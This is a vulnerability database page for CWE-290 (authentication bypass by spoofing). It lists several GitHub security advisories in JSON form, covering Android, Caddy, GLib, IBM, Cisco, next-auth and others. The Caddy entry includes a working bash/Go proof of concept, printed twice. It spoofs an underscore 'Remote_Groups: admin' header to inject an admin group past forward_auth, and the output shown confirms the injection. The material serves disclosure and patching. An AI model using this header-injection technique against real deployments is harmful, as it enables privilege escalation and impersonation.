CWE-290
AllowedAuthentication Bypass by Spoofing
Abstraction: Base · Status: Incomplete
This attack-focused weakness is caused by incorrectly implemented authentication schemes that are subject to spoofing attacks.
927 vulnerabilities reference this CWE, most recent first.
GHSA-F3J2-6V6C-59GH
Vulnerability from github – Published: 2025-09-04 21:31 – Updated: 2025-09-04 21:31In multiple locations, there is a possible lock screen bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2025-26421"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-04T18:15:39Z",
"severity": "MODERATE"
},
"details": "In multiple locations, there is a possible lock screen bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
"id": "GHSA-f3j2-6v6c-59gh",
"modified": "2025-09-04T21:31:37Z",
"published": "2025-09-04T21:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26421"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/frameworks/base/+/b66817d2ed3b6ef29873bfe9857081cdef63681f"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/packages/apps/Settings/+/f16fa58405ed94703ea1886c483a2e2ce1c2b176"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2025-05-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-F59H-Q822-G45G
Vulnerability from github – Published: 2026-06-16 21:28 – Updated: 2026-06-16 21:28Summary
forward_auth copy_headers deletes the exact client-supplied identity header before copying the trusted value from the auth gateway. But when the request later goes through php_fastcgi, Caddy normalizes HTTP headers into CGI variables by replacing - with _.
This lets a client send an underscore alias that survives the forward_auth delete step but becomes the same PHP/FastCGI variable:
Remote-Groups -> HTTP_REMOTE_GROUPS
Remote_Groups -> HTTP_REMOTE_GROUPS
Remote-User -> HTTP_REMOTE_USER
Remote_User -> HTTP_REMOTE_USER
Result: a remote client can inject or sometimes override identity/group headers trusted by PHP/FastCGI applications behind Caddy.
Details
forward_auth copy_headers intentionally removes client-controlled headers before setting values from the auth response:
modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:212modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:222
That delete is exact-field deletion through http.Header.Del():
modules/caddyhttp/headers/headers.go:255modules/caddyhttp/headers/headers.go:281
So deleting Remote-Groups does not delete Remote_Groups.
Later, FastCGI exports all request headers into CGI variables:
modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:410modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:414modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:510
The normalizer replaces hyphens with underscores:
strings.NewReplacer(" ", "_", "-", "_")
So the trusted header and the attacker-controlled alias collide in the backend-visible CGI/PHP namespace.
This is distinct from GHSA-7r4p-vjf4-gxv4. That issue allowed exact copied headers to survive. This report reproduces after the exact-header fix because the bypass uses a different HTTP field name that only becomes equivalent during Caddy's FastCGI export.
PoC
Run from the Caddy repository root with bash:
set -euo pipefail
tmpdir=$(mktemp -d /tmp/caddy-fastcgi-header-collision.XXXXXX)
mkdir -p "$tmpdir/www"
printf '<?php echo "ok"; ?>\n' > "$tmpdir/www/index.php"
cat > "$tmpdir/servers.go" <<'GO'
package main
import (
"fmt"
"log"
"net"
"net/http"
"net/http/fcgi"
)
func main() {
go func() {
mux := http.NewServeMux()
mux.HandleFunc("/auth", func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Remote-User", "alice")
w.WriteHeader(http.StatusNoContent)
})
log.Fatal(http.ListenAndServe("127.0.0.1:19011", mux))
}()
ln, err := net.Listen("tcp", "127.0.0.1:19010")
if err != nil {
log.Fatal(err)
}
log.Fatal(fcgi.Serve(ln, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
fmt.Fprintf(w, "HTTP_REMOTE_USER=%s\nHTTP_REMOTE_GROUPS=%s\n",
r.Header.Get("Remote-User"),
r.Header.Get("Remote-Groups"))
})))
}
GO
cat > "$tmpdir/Caddyfile" <<EOF
{
admin off
auto_https off
debug
}
:9082 {
log
root * $tmpdir/www
forward_auth 127.0.0.1:19011 {
uri /auth
copy_headers Remote-User Remote-Groups
}
php_fastcgi 127.0.0.1:19010
}
EOF
cleanup() {
kill "${caddy_pid:-}" "${servers_pid:-}" 2>/dev/null || true
}
trap cleanup EXIT
go run "$tmpdir/servers.go" >"$tmpdir/servers.log" 2>&1 &
servers_pid=$!
for i in $(seq 1 80); do
if (echo > /dev/tcp/127.0.0.1/19011) >/dev/null 2>&1 &&
(echo > /dev/tcp/127.0.0.1/19010) >/dev/null 2>&1; then
break
fi
sleep 0.25
done
go run ./cmd/caddy run --config "$tmpdir/Caddyfile" --adapter caddyfile >"$tmpdir/caddy.log" 2>&1 &
caddy_pid=$!
for i in $(seq 1 80); do
if (echo > /dev/tcp/127.0.0.1/9082) >/dev/null 2>&1; then
break
fi
sleep 0.25
done
curl --noproxy '*' -v http://127.0.0.1:9082/index.php
curl --noproxy '*' -v -H 'Remote_Groups: admin' http://127.0.0.1:9082/index.php
cat "$tmpdir/caddy.log"
Observed on commit 6c675e29f87cbe7326983ddb6d739175119d394c:
Baseline:
> GET /index.php HTTP/1.1
< HTTP/1.1 200 OK
HTTP_REMOTE_USER=alice
HTTP_REMOTE_GROUPS=
With attacker header:
> GET /index.php HTTP/1.1
> Remote_Groups: admin
< HTTP/1.1 200 OK
HTTP_REMOTE_USER=alice
HTTP_REMOTE_GROUPS=admin
Caddy debug log confirms the FastCGI environment contained:
"HTTP_REMOTE_USER": "alice"
"HTTP_REMOTE_GROUPS": "admin"
The auth gateway returned Remote-User: alice only. It never returned Remote-Groups.
Impact
This affects Caddy deployments that use:
forward_authwithcopy_headersfor identity or authorization headers;php_fastcgi/ FastCGI after the auth check;- a PHP/FastCGI application that trusts the resulting
HTTP_*variables.
Impact examples:
- deterministic group/role injection when the auth gateway omits an optional header, e.g.
Remote_Groups: adminbecomesHTTP_REMOTE_GROUPS=admin; - probabilistic user impersonation when both the auth gateway and client provide colliding identity headers, e.g.
Remote-UserandRemote_Userboth map toHTTP_REMOTE_USER.
Realistic examples include trusted-header SSO deployments such as Firefly III remote_user_guard using HTTP_REMOTE_USER, or MediaWiki Auth_remoteuser using HTTP_X_AUTHENTIK_USERNAME.
AI disclosure
The LLM was used to help analyze the Caddy codebase, compare relevant code paths, draft the report, and organize reproduction steps. Human security research judgment and insight were used to guide the investigation, validate the root cause, run the local reproduction, assess impact, and make the final report conclusions.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/caddyserver/caddy/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.11.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/caddyserver/caddy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-52845"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-290",
"CWE-444"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-16T21:28:28Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\n`forward_auth copy_headers` deletes the exact client-supplied identity header before copying the trusted value from the auth gateway. But when the request later goes through `php_fastcgi`, Caddy normalizes HTTP headers into CGI variables by replacing `-` with `_`.\n\nThis lets a client send an underscore alias that survives the `forward_auth` delete step but becomes the same PHP/FastCGI variable:\n\n```text\nRemote-Groups -\u003e HTTP_REMOTE_GROUPS\nRemote_Groups -\u003e HTTP_REMOTE_GROUPS\n\nRemote-User -\u003e HTTP_REMOTE_USER\nRemote_User -\u003e HTTP_REMOTE_USER\n```\n\nResult: a remote client can inject or sometimes override identity/group headers trusted by PHP/FastCGI applications behind Caddy.\n\n### Details\n\n`forward_auth copy_headers` intentionally removes client-controlled headers before setting values from the auth response:\n\n- `modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:212`\n- `modules/caddyhttp/reverseproxy/forwardauth/caddyfile.go:222`\n\nThat delete is exact-field deletion through `http.Header.Del()`:\n\n- `modules/caddyhttp/headers/headers.go:255`\n- `modules/caddyhttp/headers/headers.go:281`\n\nSo deleting `Remote-Groups` does not delete `Remote_Groups`.\n\nLater, FastCGI exports all request headers into CGI variables:\n\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:410`\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:414`\n- `modules/caddyhttp/reverseproxy/fastcgi/fastcgi.go:510`\n\nThe normalizer replaces hyphens with underscores:\n\n```go\nstrings.NewReplacer(\" \", \"_\", \"-\", \"_\")\n```\n\nSo the trusted header and the attacker-controlled alias collide in the backend-visible CGI/PHP namespace.\n\nThis is distinct from GHSA-7r4p-vjf4-gxv4. That issue allowed exact copied headers to survive. This report reproduces after the exact-header fix because the bypass uses a different HTTP field name that only becomes equivalent during Caddy\u0027s FastCGI export.\n\n### PoC\n\nRun from the Caddy repository root with `bash`:\n\n```bash\nset -euo pipefail\n\ntmpdir=$(mktemp -d /tmp/caddy-fastcgi-header-collision.XXXXXX)\nmkdir -p \"$tmpdir/www\"\nprintf \u0027\u003c?php echo \"ok\"; ?\u003e\\n\u0027 \u003e \"$tmpdir/www/index.php\"\n\ncat \u003e \"$tmpdir/servers.go\" \u003c\u003c\u0027GO\u0027\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\t\"net/http\"\n\t\"net/http/fcgi\"\n)\n\nfunc main() {\n\tgo func() {\n\t\tmux := http.NewServeMux()\n\t\tmux.HandleFunc(\"/auth\", func(w http.ResponseWriter, r *http.Request) {\n\t\t\tw.Header().Set(\"Remote-User\", \"alice\")\n\t\t\tw.WriteHeader(http.StatusNoContent)\n\t\t})\n\t\tlog.Fatal(http.ListenAndServe(\"127.0.0.1:19011\", mux))\n\t}()\n\n\tln, err := net.Listen(\"tcp\", \"127.0.0.1:19010\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tlog.Fatal(fcgi.Serve(ln, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tfmt.Fprintf(w, \"HTTP_REMOTE_USER=%s\\nHTTP_REMOTE_GROUPS=%s\\n\",\n\t\t\tr.Header.Get(\"Remote-User\"),\n\t\t\tr.Header.Get(\"Remote-Groups\"))\n\t})))\n}\nGO\n\ncat \u003e \"$tmpdir/Caddyfile\" \u003c\u003cEOF\n{\n\tadmin off\n\tauto_https off\n\tdebug\n}\n\n:9082 {\n\tlog\n\troot * $tmpdir/www\n\tforward_auth 127.0.0.1:19011 {\n\t\turi /auth\n\t\tcopy_headers Remote-User Remote-Groups\n\t}\n\tphp_fastcgi 127.0.0.1:19010\n}\nEOF\n\ncleanup() {\n\tkill \"${caddy_pid:-}\" \"${servers_pid:-}\" 2\u003e/dev/null || true\n}\ntrap cleanup EXIT\n\ngo run \"$tmpdir/servers.go\" \u003e\"$tmpdir/servers.log\" 2\u003e\u00261 \u0026\nservers_pid=$!\n\nfor i in $(seq 1 80); do\n\tif (echo \u003e /dev/tcp/127.0.0.1/19011) \u003e/dev/null 2\u003e\u00261 \u0026\u0026\n\t (echo \u003e /dev/tcp/127.0.0.1/19010) \u003e/dev/null 2\u003e\u00261; then\n\t\tbreak\n\tfi\n\tsleep 0.25\ndone\n\ngo run ./cmd/caddy run --config \"$tmpdir/Caddyfile\" --adapter caddyfile \u003e\"$tmpdir/caddy.log\" 2\u003e\u00261 \u0026\ncaddy_pid=$!\n\nfor i in $(seq 1 80); do\n\tif (echo \u003e /dev/tcp/127.0.0.1/9082) \u003e/dev/null 2\u003e\u00261; then\n\t\tbreak\n\tfi\n\tsleep 0.25\ndone\n\ncurl --noproxy \u0027*\u0027 -v http://127.0.0.1:9082/index.php\ncurl --noproxy \u0027*\u0027 -v -H \u0027Remote_Groups: admin\u0027 http://127.0.0.1:9082/index.php\ncat \"$tmpdir/caddy.log\"\n```\n\nObserved on commit `6c675e29f87cbe7326983ddb6d739175119d394c`:\n\nBaseline:\n\n```text\n\u003e GET /index.php HTTP/1.1\n\u003c HTTP/1.1 200 OK\n\nHTTP_REMOTE_USER=alice\nHTTP_REMOTE_GROUPS=\n```\n\nWith attacker header:\n\n```text\n\u003e GET /index.php HTTP/1.1\n\u003e Remote_Groups: admin\n\u003c HTTP/1.1 200 OK\n\nHTTP_REMOTE_USER=alice\nHTTP_REMOTE_GROUPS=admin\n```\n\nCaddy debug log confirms the FastCGI environment contained:\n\n```text\n\"HTTP_REMOTE_USER\": \"alice\"\n\"HTTP_REMOTE_GROUPS\": \"admin\"\n```\n\nThe auth gateway returned `Remote-User: alice` only. It never returned `Remote-Groups`.\n\n### Impact\n\nThis affects Caddy deployments that use:\n\n- `forward_auth` with `copy_headers` for identity or authorization headers;\n- `php_fastcgi` / FastCGI after the auth check;\n- a PHP/FastCGI application that trusts the resulting `HTTP_*` variables.\n\nImpact examples:\n\n- deterministic group/role injection when the auth gateway omits an optional header, e.g. `Remote_Groups: admin` becomes `HTTP_REMOTE_GROUPS=admin`;\n- probabilistic user impersonation when both the auth gateway and client provide colliding identity headers, e.g. `Remote-User` and `Remote_User` both map to `HTTP_REMOTE_USER`.\n\nRealistic examples include trusted-header SSO deployments such as Firefly III `remote_user_guard` using `HTTP_REMOTE_USER`, or MediaWiki `Auth_remoteuser` using `HTTP_X_AUTHENTIK_USERNAME`.\n\n## AI disclosure\n\nThe LLM was used to help analyze the Caddy codebase, compare relevant code paths, draft the report, and organize reproduction steps. Human security research judgment and insight were used to guide the investigation, validate the root cause, run the local reproduction, assess impact, and make the final report conclusions.",
"id": "GHSA-f59h-q822-g45g",
"modified": "2026-06-16T21:28:28Z",
"published": "2026-06-16T21:28:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/caddyserver/caddy/security/advisories/GHSA-f59h-q822-g45g"
},
{
"type": "PACKAGE",
"url": "https://github.com/caddyserver/caddy"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Caddy: FastCGI header normalization bypass in `forward_auth copy_headers`"
}
GHSA-F5WH-76C3-V562
Vulnerability from github – Published: 2024-06-04 15:30 – Updated: 2024-06-04 15:30Authentication Bypass by Spoofing vulnerability in WPMU DEV Branda allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Branda: from n/a through 3.4.14.
{
"affected": [],
"aliases": [
"CVE-2023-51542"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-04T13:15:49Z",
"severity": "MODERATE"
},
"details": "Authentication Bypass by Spoofing vulnerability in WPMU DEV Branda allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Branda: from n/a through 3.4.14.",
"id": "GHSA-f5wh-76c3-v562",
"modified": "2024-06-04T15:30:57Z",
"published": "2024-06-04T15:30:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51542"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/branda-white-labeling/wordpress-branda-plugin-3-4-14-ip-restriction-bypass-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-F632-C3RH-R2V2
Vulnerability from github – Published: 2024-05-07 18:30 – Updated: 2026-05-12 12:31An issue was discovered in GNOME GLib before 2.78.5, and 2.79.x and 2.80.x before 2.80.1. When a GDBus-based client subscribes to signals from a trusted system service such as NetworkManager on a shared computer, other users of the same computer can send spoofed D-Bus signals that the GDBus-based client will wrongly interpret as having been sent by the trusted system service. This could lead to the GDBus-based client behaving incorrectly, with an application-dependent impact.
{
"affected": [],
"aliases": [
"CVE-2024-34397"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-07T18:15:08Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in GNOME GLib before 2.78.5, and 2.79.x and 2.80.x before 2.80.1. When a GDBus-based client subscribes to signals from a trusted system service such as NetworkManager on a shared computer, other users of the same computer can send spoofed D-Bus signals that the GDBus-based client will wrongly interpret as having been sent by the trusted system service. This could lead to the GDBus-based client behaving incorrectly, with an application-dependent impact.",
"id": "GHSA-f632-c3rh-r2v2",
"modified": "2026-05-12T12:31:45Z",
"published": "2024-05-07T18:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34397"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-613116.html"
},
{
"type": "WEB",
"url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3268"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00008.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IRSFYAE5X23TNRWX7ZWEJOMISLCDSYNS"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LCDY3KA7G7D3DRXYTT46K6LFHS2KHWBH"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LL6HSJDXCXMLEIJBYV6CPOR4K2NTCTXW"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UNFJHISR4O6VFOHBFWH5I5WWMG37H63A"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IRSFYAE5X23TNRWX7ZWEJOMISLCDSYNS"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LCDY3KA7G7D3DRXYTT46K6LFHS2KHWBH"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LL6HSJDXCXMLEIJBYV6CPOR4K2NTCTXW"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UNFJHISR4O6VFOHBFWH5I5WWMG37H63A"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240531-0008"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2024/05/07/5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-F6R7-5VGC-Q2JP
Vulnerability from github – Published: 2022-07-09 00:00 – Updated: 2022-07-17 00:00IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.7 and Open Liberty are vulnerable to identity spoofing by an authenticated user using a specially crafted request. IBM X-Force ID: 225604.
{
"affected": [],
"aliases": [
"CVE-2022-22476"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-07-08T18:15:00Z",
"severity": "HIGH"
},
"details": "IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.7 and Open Liberty are vulnerable to identity spoofing by an authenticated user using a specially crafted request. IBM X-Force ID: 225604.",
"id": "GHSA-f6r7-5vgc-q2jp",
"modified": "2022-07-17T00:00:47Z",
"published": "2022-07-09T00:00:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22476"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/225604"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/6602015"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F74P-MFVV-MM55
Vulnerability from github – Published: 2025-08-08 15:30 – Updated: 2025-08-08 15:30IBM i 7.3, 7.4, 7.5, and 7.6 is affected by an authenticated user obtaining elevated privileges with IBM Digital Certificate Manager for i (DCM) due to a web session hijacking vulnerability. An authenticated user without administrator privileges could exploit this vulnerability to perform actions in DCM as an administrator.
{
"affected": [],
"aliases": [
"CVE-2025-36119"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-08T15:15:28Z",
"severity": "HIGH"
},
"details": "IBM i 7.3, 7.4, 7.5, and 7.6 is affected by an authenticated user obtaining elevated privileges with IBM Digital Certificate Manager for i (DCM) due to a web session hijacking vulnerability. An authenticated user without administrator privileges could exploit this vulnerability to perform actions in DCM as an administrator.",
"id": "GHSA-f74p-mfvv-mm55",
"modified": "2025-08-08T15:30:34Z",
"published": "2025-08-08T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36119"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/7241008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-F7QM-MCG6-FHVG
Vulnerability from github – Published: 2024-10-23 18:33 – Updated: 2024-10-23 18:33A vulnerability in the AnyConnect firewall for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access control list (ACL) and allow traffic that should have been denied to flow through an affected device. This vulnerability is due to a logic error in populating group ACLs when an AnyConnect client establishes a new session toward an affected device. An attacker could exploit this vulnerability by establishing an AnyConnect connection to the affected device. A successful exploit could allow the attacker to bypass configured ACL rules.
{
"affected": [],
"aliases": [
"CVE-2024-20299"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-23T17:15:16Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the AnyConnect firewall for Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass a configured access control list (ACL) and allow traffic that should have been denied to flow through an affected device. This vulnerability is due to a logic error in populating group ACLs when an AnyConnect client establishes a new session toward an affected device. An attacker could exploit this vulnerability by establishing an AnyConnect connection to the affected device. A successful exploit could allow the attacker to bypass configured ACL rules.",
"id": "GHSA-f7qm-mcg6-fhvg",
"modified": "2024-10-23T18:33:08Z",
"published": "2024-10-23T18:33:08Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20299"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-acl-bypass-VvnLNKqf"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-xss-M446vbEO"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75300"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-F8W4-9VP9-7V2Q
Vulnerability from github – Published: 2026-02-23 21:31 – Updated: 2026-02-25 15:31Improper session management in GCOM EPON 1GE ONU version C00R371V00B01 allows attackers to execute a session hijacking attack via spoofing the IP address of an authenticated user.
{
"affected": [],
"aliases": [
"CVE-2025-71056"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-23T21:19:09Z",
"severity": "CRITICAL"
},
"details": "Improper session management in GCOM EPON 1GE ONU version C00R371V00B01 allows attackers to execute a session hijacking attack via spoofing the IP address of an authenticated user.",
"id": "GHSA-f8w4-9vp9-7v2q",
"modified": "2026-02-25T15:31:37Z",
"published": "2026-02-23T21:31:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71056"
},
{
"type": "WEB",
"url": "https://github.com/theShinigami/CVE-Disclosures/blob/main/CVE-2025-71056/README.md"
},
{
"type": "WEB",
"url": "https://johnbai.en.made-in-china.com/product/JXnENzmlJFpv/China-H18gn-Series-Gpon-Ont-ONU.html"
},
{
"type": "WEB",
"url": "http://www.szgcom.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-F9PC-9R24-4PR7
Vulnerability from github – Published: 2022-05-24 17:30 – Updated: 2022-05-24 17:30Improperly implemented security check in McAfee Active Response (MAR) prior to 2.4.4 may allow local administrators to execute malicious code via stopping a core Windows service leaving McAfee core trust component in an inconsistent state resulting in MAR failing open rather than closed
{
"affected": [],
"aliases": [
"CVE-2020-7326"
],
"database_specific": {
"cwe_ids": [
"CWE-290"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-10-15T10:15:00Z",
"severity": "MODERATE"
},
"details": "Improperly implemented security check in McAfee Active Response (MAR) prior to 2.4.4 may allow local administrators to execute malicious code via stopping a core Windows service leaving McAfee core trust component in an inconsistent state resulting in MAR failing open rather than closed",
"id": "GHSA-f9pc-9r24-4pr7",
"modified": "2022-05-24T17:30:47Z",
"published": "2022-05-24T17:30:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7326"
},
{
"type": "WEB",
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10331"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-F9WG-5F46-CJMW
Vulnerability from github – Published: 2022-04-22 20:49 – Updated: 2022-04-22 20:49next-auth v3 users before version 3.29.2 are impacted. (We recommend upgrading to v4 in most cases. See our migration guide).next-auth v4 users before version 4.3.2 are impacted. Upgrading to 3.29.2 or 4.3.2 will patch this vulnerability. If you are not able to upgrade for any reason, you can add a configuration to your callbacks option:
// async redirect(url, baseUrl) { // v3
async redirect({ url, baseUrl }) { // v4
// Allows relative callback URLs
if (url.startsWith("/")) return new URL(url, baseUrl).toString()
// Allows callback URLs on the same origin
else if (new URL(url).origin === baseUrl) return url
return baseUrl
}
If you already have a redirect callback, make sure that you match the incoming url origin against the baseUrl.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "next-auth"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.29.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "next-auth"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.3.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-24858"
],
"database_specific": {
"cwe_ids": [
"CWE-290",
"CWE-601"
],
"github_reviewed": true,
"github_reviewed_at": "2022-04-22T20:49:09Z",
"nvd_published_at": "2022-04-19T23:15:00Z",
"severity": "MODERATE"
},
"details": "`next-auth` v3 users before version 3.29.2 are impacted. (We recommend upgrading to v4 in most cases. See our [migration guide](https://next-auth.js.org/getting-started/upgrade-v4)).`next-auth` v4 users before version 4.3.2 are impacted. Upgrading to 3.29.2 or 4.3.2 will patch this vulnerability. If you are not able to upgrade for any reason, you can add a configuration to your `callbacks` option:\n\n```js\n// async redirect(url, baseUrl) { // v3\nasync redirect({ url, baseUrl }) { // v4\n // Allows relative callback URLs\n if (url.startsWith(\"/\")) return new URL(url, baseUrl).toString()\n // Allows callback URLs on the same origin\n else if (new URL(url).origin === baseUrl) return url\n return baseUrl\n}\n```\nIf you already have a `redirect` callback, make sure that you match the incoming `url` origin against the `baseUrl`.",
"id": "GHSA-f9wg-5f46-cjmw",
"modified": "2022-04-22T20:49:09Z",
"published": "2022-04-22T20:49:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nextauthjs/next-auth/security/advisories/GHSA-f9wg-5f46-cjmw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24858"
},
{
"type": "WEB",
"url": "https://github.com/nextauthjs/next-auth/commit/6e15bdcb2d93c1ad5ee3889f702607637e79db50"
},
{
"type": "PACKAGE",
"url": "https://github.com/nextauthjs/next-auth"
},
{
"type": "WEB",
"url": "https://github.com/nextauthjs/next-auth/releases/tag/next-auth%40v4.3.2"
},
{
"type": "WEB",
"url": "https://next-auth.js.org/configuration/callbacks#redirect-callback"
},
{
"type": "WEB",
"url": "https://next-auth.js.org/getting-started/upgrade-v4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "NextAuth.js default redirect callback vulnerable to open redirects"
}
No mitigation information available for this CWE.
CAPEC-21: Exploitation of Trusted Identifiers
